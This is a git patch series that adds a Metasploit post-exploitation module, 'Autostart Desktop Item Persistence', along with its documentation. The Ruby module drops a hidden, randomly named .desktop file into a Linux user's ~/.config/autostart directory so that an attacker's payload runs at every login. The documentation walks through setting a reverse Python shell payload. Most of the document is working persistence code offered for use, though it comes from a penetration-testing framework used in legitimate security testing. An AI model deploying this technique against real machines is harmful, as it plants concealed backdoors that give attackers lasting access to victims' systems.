From 6b4870389db4069efb2ecb6745e67de72c1073a7 Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 12:01:30 +0200 Subject: [PATCH 01/10] Add autostart module --- .../linux/local/autostart_persistence.rb | 60 +++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 modules/exploits/linux/local/autostart_persistence.rb diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb new file mode 100644 index 0000000000..48fff07719 --- /dev/null +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -0,0 +1,60 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Unix + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Autostart Desktop Item Persistence', + 'Description' => %q( + This module will create an autostart entry to execute a payload. + ), + 'License' => MSF_LICENSE, + 'Author' => [ 'Eliott Teissonniere' ], + 'Platform' => [ 'unix', 'linux' ], + 'Arch' => ARCH_CMD, + 'Payload' => { + 'BadChars' => '#%\n"', + 'Compat' => { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic python netcat' + } + }, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' }, + 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0 + )) + + register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ]) + end + + def exploit + name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) + vprint_status ("Name is #{name}") + + vprint_status payload.encoded + + home = cmd_exec('echo ~') + + path = "#{home}/.config/autostart/#{name}.desktop" + print_status("Creating #{path}") + + print_status('Making sure the autostart directory exists') + cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists + + print_status('Uploading autostart file') + cmd_exec("rm #{path}") + + write_file(path, "[Desktop Entry]\nType=Application\nName=#{name}\nNoDisplay=true\nTerminal=false\nExec=/bin/sh -c \"#{payload.encoded}\"\n") + end +end + From a22acf3f3eb2e87293a6e3a954b747008a578d7a Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 12:02:52 +0200 Subject: [PATCH 02/10] Document autostart module --- .../linux/local/autostart_persistence.md | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 documentation/modules/exploit/linux/local/autostart_persistence.md diff --git a/documentation/modules/exploit/linux/local/autostart_persistence.md b/documentation/modules/exploit/linux/local/autostart_persistence.md new file mode 100644 index 0000000000..1b960aead4 --- /dev/null +++ b/documentation/modules/exploit/linux/local/autostart_persistence.md @@ -0,0 +1,22 @@ +## Autostart persistence + +This module persist a payload by creating a `.desktop` entry for Linux desktop targets. + +### Testing + +1. Exploit a box +2. `use exploit/linux/local/autostart_persistence` +3. `set SESSION ` +4. `set PAYLOAD cmd/unix/reverse_python` (for instance), configure the payload as needed +5. `exploit` + +When the victim reboots your payload will be executed! + + +### Options + + +**NAME** + +Name of the `.desktop` entry to add, if not specified it will be chosen randomly. + From 9962cbebfde5446416b8089125da98c247061658 Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 15:19:13 +0200 Subject: [PATCH 03/10] Support perl payload --- modules/exploits/linux/local/autostart_persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 48fff07719..300aa179c5 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local 'BadChars' => '#%\n"', 'Compat' => { 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic python netcat' + 'RequiredCmd' => 'generic python netcat perl' } }, 'SessionTypes' => [ 'shell', 'meterpreter' ], From e4d6eb07ca90f7c7aaef2dda0eae20f5b1d408ed Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 15:19:46 +0200 Subject: [PATCH 04/10] Remove useless statement --- modules/exploits/linux/local/autostart_persistence.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 300aa179c5..914b1bd01c 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -41,8 +41,6 @@ class MetasploitModule < Msf::Exploit::Local name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) vprint_status ("Name is #{name}") - vprint_status payload.encoded - home = cmd_exec('echo ~') path = "#{home}/.config/autostart/#{name}.desktop" From c1d929f5fbef87e06edd4760e5d8e2418433609f Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 15:26:17 +0200 Subject: [PATCH 05/10] Use an HEREDOC for multiline string --- modules/exploits/linux/local/autostart_persistence.rb | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 914b1bd01c..0b5ed7750e 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -52,7 +52,14 @@ class MetasploitModule < Msf::Exploit::Local print_status('Uploading autostart file') cmd_exec("rm #{path}") - write_file(path, "[Desktop Entry]\nType=Application\nName=#{name}\nNoDisplay=true\nTerminal=false\nExec=/bin/sh -c \"#{payload.encoded}\"\n") + write_file(path, <<~HEREDOC + [Desktop Entry] + Type=Application + Name=#{name} + NoDisplay=true + Terminal=false + Exec=/bin/sh -c "#{payload.encoded}" + HEREDOC) end end From e82bde993f61284bf72742458621c53faa0b5017 Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 15:32:15 +0200 Subject: [PATCH 06/10] Cleanup indentation --- .../linux/local/autostart_persistence.rb | 114 +++++++++--------- 1 file changed, 57 insertions(+), 57 deletions(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 0b5ed7750e..fec187c18b 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -4,62 +4,62 @@ ## class MetasploitModule < Msf::Exploit::Local - Rank = ExcellentRanking - - include Msf::Post::File - include Msf::Post::Unix - include Msf::Exploit::FileDropper - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Autostart Desktop Item Persistence', - 'Description' => %q( - This module will create an autostart entry to execute a payload. - ), - 'License' => MSF_LICENSE, - 'Author' => [ 'Eliott Teissonniere' ], - 'Platform' => [ 'unix', 'linux' ], - 'Arch' => ARCH_CMD, - 'Payload' => { - 'BadChars' => '#%\n"', - 'Compat' => { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic python netcat perl' - } - }, - 'SessionTypes' => [ 'shell', 'meterpreter' ], - 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' }, - 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart - 'Targets' => [ ['Automatic', {}] ], - 'DefaultTarget' => 0 - )) - - register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ]) - end - - def exploit - name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) - vprint_status ("Name is #{name}") - - home = cmd_exec('echo ~') - - path = "#{home}/.config/autostart/#{name}.desktop" - print_status("Creating #{path}") - - print_status('Making sure the autostart directory exists') - cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists - - print_status('Uploading autostart file') - cmd_exec("rm #{path}") - - write_file(path, <<~HEREDOC - [Desktop Entry] - Type=Application - Name=#{name} - NoDisplay=true - Terminal=false - Exec=/bin/sh -c "#{payload.encoded}" - HEREDOC) - end + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Unix + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Autostart Desktop Item Persistence', + 'Description' => %q( + This module will create an autostart entry to execute a payload. + ), + 'License' => MSF_LICENSE, + 'Author' => [ 'Eliott Teissonniere' ], + 'Platform' => [ 'unix', 'linux' ], + 'Arch' => ARCH_CMD, + 'Payload' => { + 'BadChars' => '#%\n"', + 'Compat' => { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic python netcat perl' + } + }, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' }, + 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0 + )) + + register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ]) + end + + def exploit + name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) + vprint_status ("Name is #{name}") + + home = cmd_exec('echo ~') + + path = "#{home}/.config/autostart/#{name}.desktop" + print_status("Creating #{path}") + + print_status('Making sure the autostart directory exists') + cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists + + print_status('Uploading autostart file') + cmd_exec("rm #{path}") + + write_file(path, <<~HEREDOC + [Desktop Entry] + Type=Application + Name=#{name} + NoDisplay=true + Terminal=false + Exec=/bin/sh -c "#{payload.encoded}" + HEREDOC) + end end From fc234b09c2182d8191182eea09c388a13e1880bf Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 16:13:42 +0200 Subject: [PATCH 07/10] Fix HEREDOC not always supported --- .../linux/local/autostart_persistence.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index fec187c18b..29b07bdaf4 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -52,14 +52,14 @@ class MetasploitModule < Msf::Exploit::Local print_status('Uploading autostart file') cmd_exec("rm #{path}") - write_file(path, <<~HEREDOC - [Desktop Entry] - Type=Application - Name=#{name} - NoDisplay=true - Terminal=false - Exec=/bin/sh -c "#{payload.encoded}" - HEREDOC) + write_file(path, [ + "[Desktop Entry]", + "Type=Application", + "Name=#{name}", + "NoDisplay=true", + "Terminal=false", + "Exec=/bin/sh -c \"#{payload.encoded}\"" + ].join("\n")) end end From eb43e4c0bde14f1647677c0fd04091df00a09332 Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 16:47:27 +0200 Subject: [PATCH 08/10] Rework status printing --- modules/exploits/linux/local/autostart_persistence.rb | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 29b07bdaf4..618491ba04 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -39,18 +39,15 @@ class MetasploitModule < Msf::Exploit::Local def exploit name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) - vprint_status ("Name is #{name}") home = cmd_exec('echo ~') path = "#{home}/.config/autostart/#{name}.desktop" - print_status("Creating #{path}") print_status('Making sure the autostart directory exists') cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists - print_status('Uploading autostart file') - cmd_exec("rm #{path}") + print_status("Uploading autostart file #{path}") write_file(path, [ "[Desktop Entry]", From 63a58d337811eea815e4b93ddb244cb8126d097b Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Thu, 9 Aug 2018 10:23:19 +0200 Subject: [PATCH 09/10] Code style random name --- modules/exploits/linux/local/autostart_persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 618491ba04..8ce69ab1f1 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Local end def exploit - name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) + name = datastore['NAME'] || Rex::Text.rand_text_alpha(5) home = cmd_exec('echo ~') From 865898cba7252c28992d5043d1cf1c1692cccde9 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 20 Aug 2018 17:51:41 +0800 Subject: [PATCH 10/10] minor fixes --- .../modules/exploit/linux/local/autostart_persistence.md | 2 +- modules/exploits/linux/local/autostart_persistence.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/local/autostart_persistence.md b/documentation/modules/exploit/linux/local/autostart_persistence.md index 1b960aead4..81f2e889f2 100644 --- a/documentation/modules/exploit/linux/local/autostart_persistence.md +++ b/documentation/modules/exploit/linux/local/autostart_persistence.md @@ -10,7 +10,7 @@ This module persist a payload by creating a `.desktop` entry for Linux desktop t 4. `set PAYLOAD cmd/unix/reverse_python` (for instance), configure the payload as needed 5. `exploit` -When the victim reboots your payload will be executed! +When the victim logs in your payload will be executed! ### Options diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 8ce69ab1f1..7820bacf30 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -8,13 +8,13 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::File include Msf::Post::Unix - include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Autostart Desktop Item Persistence', 'Description' => %q( This module will create an autostart entry to execute a payload. + The payload will be executed when the users logs in. ), 'License' => MSF_LICENSE, 'Author' => [ 'Eliott Teissonniere' ],